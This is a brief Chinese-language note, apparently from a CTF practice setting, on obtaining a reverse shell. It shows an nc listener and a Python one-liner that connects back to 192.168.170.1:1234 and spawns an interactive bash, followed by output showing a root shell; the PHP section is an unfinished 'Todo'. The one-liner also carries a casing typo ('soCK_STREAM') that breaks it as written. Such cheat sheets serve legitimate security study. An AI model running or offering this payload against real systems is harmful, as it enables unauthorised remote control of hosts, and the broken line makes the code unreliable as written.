参考:
http://zeroyu.xyz/2017/01/21/Commix%E5%91%BD%E4%BB%A4%E8%AF%A6%E8%A7%A3/
Python
先在自己机器上执行
[~]$ nc -vl 192.168.170.1 1234
即在192.168.170.1/24网段上监听1234端口。
然后在target的shell中执行
[~/repos/CTF/BSides-CTF-2017]$ python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.soCK_STREAM);s.connect(('192.168.170.1',1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
反弹出去一个/bin/bash,然后自己机器上就得到了一个bash。
[~]$ nc -vl 192.168.170.1 1234 [17:20:18]
root@kali:~/repos/CTF/BSides-CTF-2017#
root@kali:~/repos/CTF/BSides-CTF-2017# id
id
uid=0(root) gid=0(root) groups=0(root)
PHP
//Todo
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。
